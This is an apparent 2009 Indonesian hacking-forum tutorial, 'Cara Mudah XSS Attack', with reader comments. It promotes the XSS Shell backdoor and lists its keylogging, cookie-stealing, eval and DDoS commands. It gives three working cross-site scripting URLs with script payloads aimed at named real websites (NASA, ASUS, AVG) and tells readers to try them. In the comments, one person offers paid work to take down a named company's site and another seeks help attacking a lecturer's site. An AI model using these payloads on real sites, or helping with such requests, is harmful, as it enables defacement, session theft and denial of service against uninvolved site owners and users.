Binus Hacker - Independent Hacking Community   Subscribe to Binus Hacker Subscribe to Binus Hacker

Cara Mudah XSS Attack

28 February 2009
Penulis: UtuH   · Kategori Artikel: Tutorial

Binus Hacker Sponsor Banner


Huah! Emang jaman udah serba mudah :) Ni klo ada yang nanya gimana sih cara ngehack pake XSS? Cross-Site Scripting!

Haduh coy, itu gampang banget! Sekarang mah gak usah riber ribet.

Pertama gw belajarnya dari sini ni, tapi agak ribet. Buat newbie sih gak apa” buat blajar lebih dalam ajah.

Link dari abang Rsnake: http://ha.ckers.org/xss.html

Itu tutorial mantap banget dah buat XSS.

Btw ini ada di video cara simplenya:
Part 1.

Part.2

Part.3

Nah semuanya, itu semua make XSS Shell atau lebih terkenal dengan XSS Tunnel – Proxy. Nah ini penjelasannya.

XSS Shell adalah XSS backdoor interaktif yang memungkinkan mendapatkan kontrol atas Cross-Site Scripting (XSS) vulnerability dalam aplikasi web. Menunjukkan seberapa kuatnya serangan melalui XSS ini.

APAKAH XSS SHELL?

XSS Shell adalah XSS backdoor dan zombie manager. Konsep ini pertama kali dikenalkan oleh XSS-Proxy (http://xss-proxy.sourceforge.net/). Biasanya dalam serangan XSS, penyerang memiliki satu target, dimana dengan XSS Shell anda dapat mengirim permintaan interaktif dan mendapatkan respon dari korban. Anda dapat menyisipkan backdoor pada halaman tersebut.

Anda bisa mencuri autektikasi pada website, Anda dapat memotong pembatasan IP di administrasi panel, Anda dapat DDoS beberapa sistem . Pada dasarnya alat ini menunjukkan bahwa Anda dapat berbuat lebih banyak dengan XSS.

FEATURES

XSS Shell memiliki beberapa fitur untuk memperoleh akses terhadap target. Anda juga dapat menambahkan perintah Anda sendiri.

Kebanyakan dari fitur yang dapat diaktifkan atau dinonaktifkan dari konfigurasi atau dapat dirubah sendiri dengan merubah sourcecode.

Fitur:

* Regenerating page
* Keylogger
* Mouse logger

Built-in Perintah:

* Mendapatkan Keylogger Data
* Mendapatkan Halaman (Current diberikan Dom / seperti screenshot)
* Mendapatkan Cookie
* Menjalankan javascript (eval)
* Mendapatkan Clipboard (IE only)
* Mendapatkan alamat IP internal (hanya Firefox + JVM)
* Mendapatkan cookie URL yang dikunjungi
* DDoS
* Force untuk melakukan Crash ke browser

Silakan coba berikut ini:

NASA Site:

http://comments-submit.nasa.gov/commenting/Comment.do?location=%22%3E%3C/TITLE%3E%3CSCRIPT%3Ealert(%22BinusHacker%20Was%20Here!!%22);%3C/SCRIPT%3E%3CMARQUEE%20BGCOLOR=%22RED%22%3E%3CH1%3EXSS%20Attack%20by%20BinusHacker%20Team%3C/H1%3E%3C/MARQUEE%3E

ASUS Site:

http://vip.asus.com/eservice/techservok.aspx?SLanguage=en-us&caseid=%3Cscript%3Ealert(%22XSS%20ATTACK%20By%20BINUSHACKER%20TEAM%22)%3C/script%3E%3CMARQUEE%20BGCOLOR=%22RED%22%3E%3CH1%3EXSS%20Attack%20by%20BinusHacker%20Team%3C/H1%3E%3C/MARQUEE%3E

AVG Site:

http://www.avg.com/platforms?lic=%22%3E%3Cscript%3Ealert(%22BinusHacker%20Team%20Was%20Here%22)%3C/script%3E%3CMARQUEE%20BGCOLOR=%22RED%22%3E%3CH1%3EXSS%20Attack%20by%20BinusHacker%20Team%3C/H1%3E%3C/MARQUEE%3E

Silakan anda otak atik sendiri menggunakan XSS Shell.

===============[ EOF ]===============

Gw tidak mengajarkan kejahatan, cuma berbagi pengetahuan :D

Greetz: Buat gwe sendiri.. Wkwkwk [ GG Mode On ]

Special thanks: Binus Hacker Team

Binus Hacker Sponsor Banner

Komentar

17 Komentar Untuk “Cara Mudah XSS Attack
Silahkan Berikan Tanggapan Anda Untuk Artikel Ini...

  1. Syahri pada 2 March 2009 1:27 am

    Tuh, baca SMS gw ga ? gw dapet job buat ATTACKING website PT. Adhi Karya, loe serang sampe down deh ! Tapi kl loe bisa deface ntar jgn bawa-bawa nama BinusHacker ato Binus, ntar problem lagi, soal duit lelah pasti ada… dan lumayan SIGNIFIKAN !

  2. Cross Site Scripting » Blog Archive » Binus Hacker » Cara Mudah Xss Attack pada 3 March 2009 9:33 am

    [...] Huah! Emang jaman udah serba mudah Ni klo ada yang nanya gimana sih cara ngehack pake XSS? Cross -Site Scripting ! Haduh coy, itu gampang banget! Sekarang mah gak usah riber ribet. Pertama gw belajarnya dari sini ni, tapi agak ribet. …Continue Reading [...]

  3. nugrah lucu pada 20 March 2009 10:08 pm

    hag hag hag mayan negh buat nambah2 catatan,,hag hag hag

  4. Fere_X pada 22 March 2009 1:12 am

    keren2…tapi ada cara yg laen na ga???

  5. Ma2nk Asep pada 26 April 2009 10:32 pm

    Akh,
    Iyo nian ap???

    Klo Iyo, Tolong bntuin aq cari duit untuk kliah yo…

    Oke Bro…

  6. manusia tak luput dari dosa pada 4 June 2009 1:52 am

    exelent….!!!

  7. Lunar Filth pada 4 July 2009 3:19 am

    Btw ini ada di video cara simplenya:
    Part 1.

    Part.2

    Part.3

    Nah semuanya, itu semua make XSS Shell atau lebih terkenal dengan XSS Tunnel – Proxy. Nah ini penjelasannya.

    “Kata ada video cara simpe ..?? koQ gag ada link`a bang ??”
    Okeh tentang XSS`a full juga neh pembahasan`a tidak bertele”,wheuehhe ~B-)

  8. reza pada 4 July 2009 11:42 am

    Maz, tolong cariin XSS di comment Friendster donk, please, blz ke email ku jg gpp, thanks yach..

    r324_milanisti@yahoo.com

  9. tio pada 27 August 2009 10:52 am

    manteep oom…

  10. Pintuz pada 2 September 2009 9:20 am

    seep dah…
    lanjut ke mly
    perang !!!!

  11. vios pada 29 November 2009 8:49 pm

    ikutan dong belajar … batu ya boss

  12. aweteens pada 27 December 2009 7:52 am

    aduh binggung dah malah liat videonya ga jelas gt. huh
    ada yg bener2 bsa gampang pelajarinnya ga boss ??
    tolongin dongg

  13. dave pada 23 February 2010 9:27 pm

    sorry gw mau nanya kalau pencegahannya gimana ?? thanks……

  14. dryx212 pada 8 March 2010 12:41 pm
  15. zanie pada 1 April 2010 7:33 am

    ikutan dong belajar … ya boss

  16. Ifan pada 23 April 2010 7:51 pm

    Tolong pencerahannya dong buat yg dah master
    Aku mau tau gimana cara injeksi script ke web,
    soalnya aku kesel banget sama dosen aku yg sombong karna baru membuat website, kuliah 4 sks ngomongin web dia terus,..
    kita2 siswa disuruh jadi testingnya..
    Gaya nya kayak paling hebat sendiri, SOMBHONG skali dengan kemampuannya.
    aku mau coba teting keamanan web dia tapi gak ngerti cara injeksi scriptnya.
    TOLONG pencerahannya aku mau kasih pelajaran aja suapaya dia janganterlalu sombong..

    yang tutorialnya tolong send ke aku by email di aglinmaeesa@yahoo.com

    makasih banyak sebelumnya ^_^

  17. konthol pada 9 July 2010 1:46 am

    apik kang iki yg berguna saat ini gue jg pernah hack mnggunkan xss 1005 working weks

Silahkan Berikan Tanggapan Anda...